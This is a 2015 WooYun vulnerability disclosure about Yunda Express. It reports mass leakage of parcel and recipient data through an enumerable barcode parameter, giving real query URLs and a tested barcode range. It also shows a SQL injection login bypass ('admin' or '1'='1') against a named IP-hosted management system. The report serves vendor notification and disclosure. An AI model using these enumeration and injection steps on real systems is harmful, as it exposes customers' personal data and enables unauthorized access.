当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125072

漏洞标题:快递安全之韵达快递海量快件信息泄漏二(用户签收详图)

相关厂商:韵达快递

漏洞作者: harbour_bin

提交时间:2015-07-07 10:54

修复时间:2015-08-21 13:24

公开时间:2015-08-21 13:24

漏洞类型:敏感信息泄露

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-07: 细节已通知厂商并且等待厂商处理中
2015-07-07: 厂商已经确认,细节仅向厂商公开
2015-07-17: 细节向核心白帽子及相关领域专家公开
2015-07-27: 细节向普通白帽子公开
2015-08-06: 细节向实习白帽子公开
2015-08-21: 细节向公众公开

简要描述:

快递安全之韵达快递海量快件信息泄漏2#, 大小包拆分对比查询导致, 通过遍历大包条形码可获取海量数据. 此外, 附送一处SQL注入漏洞!

详细说明:

URL举例:
http://kjcx.yundasys.com/kjcx/dbdb.php?op=search&&dbtxm=9000150694113
http://kjcx.yundasys.com/kjcx/dbdb.php?op=search&&dbtxm=9000171901331
http://kjcx.yundasys.com/kjcx/dbdb.php?op=search&&dbtxm=9000253165011
http://kjcx.yundasys.com/kjcx/dbdb.php?op=search&&dbtxm=9000090365632
http://kjcx.yundasys.com/kjcx/dbdb.php?op=search&&dbtxm=9000124937515
http://kjcx.yundasys.com/kjcx/dbdb.php?op=search&&dbtxm=9000176011525
参数dbtxm可进行修改


测试了从9000090365001到9000090365817之间, 是可以查询到订单数据的. 此参数具有规律, 可轻易查询到海量数据

大小包拆包对比.jpg


大小包拆包对比1.jpg


点击页面中批量查询后, 细节图

批量查询后.jpg


可得到用户快递单:

351000409681880.jpg


SQL注入漏洞
URL:http://180.153.139.84:11381/ydccp/login.jsp 物业门店管理系统
用户名:admin' or '1'='1 密码:123456
今年的报表数据:8256条

物业门店.jpg

漏洞证明:

已证明!

修复方案:

你们更专业!
PS:安全态度和意识同等重要, 厂商还是早点修复, 避免被恶意利用吧!

版权声明:转载请注明来源 harbour_bin@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-07-07 13:22

厂商回复:

感谢指出,我们将及时修复

最新状态:

暂无